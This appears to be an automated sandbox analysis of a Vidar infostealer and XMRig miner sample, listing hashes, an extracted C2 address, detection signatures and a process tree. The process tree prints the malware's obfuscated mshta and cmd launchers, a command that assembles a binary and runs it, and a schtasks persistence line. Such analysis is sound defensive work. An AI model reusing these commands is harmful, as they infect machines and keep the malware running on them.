Overview

overview

10

Static

static

022e3c30a1...66.exe

windows7_x64

10

022e3c30a1...66.exe

windows10_x64

10

043d28836f...9f.exe

windows7_x64

10

043d28836f...9f.exe

windows10_x64

10

096fc162ed...c8.exe

windows7_x64

10

096fc162ed...c8.exe

windows10_x64

10

1ad787b5aa...62.exe

windows7_x64

10

1ad787b5aa...62.exe

windows10_x64

10

258cbb13ac...bd.exe

windows7_x64

10

258cbb13ac...bd.exe

windows10_x64

10

25d79c1a50...7f.exe

windows7_x64

10

25d79c1a50...7f.exe

windows10_x64

10

4d27dca0a1...ef.exe

windows7_x64

10

4d27dca0a1...ef.exe

windows10_x64

10

500e7e5c00...44.exe

windows7_x64

10

500e7e5c00...44.exe

windows10_x64

10

578a3a7a2b...b3.exe

windows7_x64

10

578a3a7a2b...b3.exe

windows10_x64

10

7dc7ca2414...84.exe

windows7_x64

10

7dc7ca2414...84.exe

windows10_x64

10

96c9fde298...34.exe

windows7_x64

10

96c9fde298...34.exe

windows10_x64

10

9c4880a98c...82.exe

windows7_x64

10

9c4880a98c...82.exe

windows10_x64

10

a1dad4a83d...c4.exe

windows7_x64

10

a1dad4a83d...c4.exe

windows10_x64

10

acf1b7d80f...e0.exe

windows7_x64

10

acf1b7d80f...e0.exe

windows10_x64

10

ca14b87b56...83.exe

windows7_x64

10

ca14b87b56...83.exe

windows10_x64

10

cbf31d825a...d2.exe

windows7_x64

8

cbf31d825a...d2.exe

windows10_x64

10

Analysis

  • max time kernel
    179s
  • max time network
    188s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    08-11-2021 10:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

  • Size

    7.0MB

  • MD5

    42fff45c940c819040ca8920fbb405cc

  • SHA1

    753821199880873e232bbe95ab2beb4ad0b6797c

  • SHA256

    96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434

  • SHA512

    7943f9d50e11fae6e3bc1a2fdf05bf5a1a96e3366948157ae1067e4f7834f692f1d2a59cf7fe4ef13e773596ca5a0ad26d62bbd285412550c01d02c1d4f7a05f

Score
10/10
vidarxmrig933discoveryminerpersistencestealersuricata

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

933

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Vidar Stealer 2 IoCs
    stealer
  • XMRig Miner Payload 2 IoCs
    miner
  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 8 IoCs
    installer
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 16 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1004
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1496
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1856
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2684
          • C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            2⤵
              PID:2620
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2696
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2576
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2356
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                    1⤵
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4564
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                      • Drops file in System32 directory
                      • Checks processor information in registry
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      PID:3832
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1288
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1240
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1080
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                          1⤵
                          • Drops file in System32 directory
                          PID:916
                        • C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe
                          "C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4188
                          • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
                            "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4444
                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:436
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 920
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2456
                          • C:\Users\Admin\AppData\Local\Temp\inst2.exe
                            "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:800
                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                            "C:\Users\Admin\AppData\Local\Temp\4.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3180
                          • C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
                            "C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3800
                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2764
                            • C:\Users\Admin\AppData\Local\Temp\is-5DTO1.tmp\setup.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-5DTO1.tmp\setup.tmp" /SL5="$301E0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:2088
                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3412
                                • C:\Users\Admin\AppData\Local\Temp\is-5TOGE.tmp\setup.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-5TOGE.tmp\setup.tmp" /SL5="$201EC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4104
                                  • C:\Users\Admin\AppData\Local\Temp\is-LE24F.tmp\postback.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-LE24F.tmp\postback.exe" ss1
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4028
                                  • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                    "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3652
                                  • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                    "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3196
                          • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                            "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:912
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4252
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5000
                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4600
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                    6⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4876
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                      7⤵
                                        PID:2740
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                      6⤵
                                        PID:3848
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                          7⤵
                                            PID:4964
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                              8⤵
                                                PID:1932
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                8⤵
                                                  PID:4244
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  msiexec -Y ..\lXQ2g.WC
                                                  8⤵
                                                  • Loads dropped DLL
                                                  PID:3396
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill -f -iM "search_hyperfs_206.exe"
                                            5⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1068
                                    • C:\Users\Admin\AppData\Local\Temp\8.exe
                                      "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:1100
                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:1020
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "LzmwAqmV.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" & exit
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:5008
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "LzmwAqmV.exe" /f
                                            5⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:900
                                    • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1596
                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Adds Run key to start application
                                        PID:1912
                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
                                          4⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Loads dropped DLL
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of FindShellTrayWindow
                                          PID:3008
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffb218adec0,0x7ffb218aded0,0x7ffb218adee0
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:4252
                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff724b09e70,0x7ff724b09e80,0x7ff724b09e90
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:4992
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1544 /prefetch:2
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:776
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=1660 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:704
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=2128 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3068
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2632 /prefetch:1
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4028
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2192 /prefetch:1
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3144
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2960 /prefetch:2
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2336
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=3312 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2096
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=3332 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4072
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=392 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1316
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=3500 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4124
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=3436 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4376
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1532,15194276352697766687,6002821232178468449,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3008_1744811548" --mojo-platform-channel-handle=2108 /prefetch:8
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4840
                                    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2184
                                      • C:\Windows\System32\conhost.exe
                                        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:648
                                        • C:\Windows\System32\cmd.exe
                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                          4⤵
                                            PID:4888
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                              5⤵
                                              • Creates scheduled task(s)
                                              PID:1620
                                          • C:\Windows\System32\cmd.exe
                                            "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                            4⤵
                                              PID:4392
                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                C:\Users\Admin\AppData\Roaming\services64.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3880
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                  6⤵
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2564
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4860
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "/sihost64"
                                                      8⤵
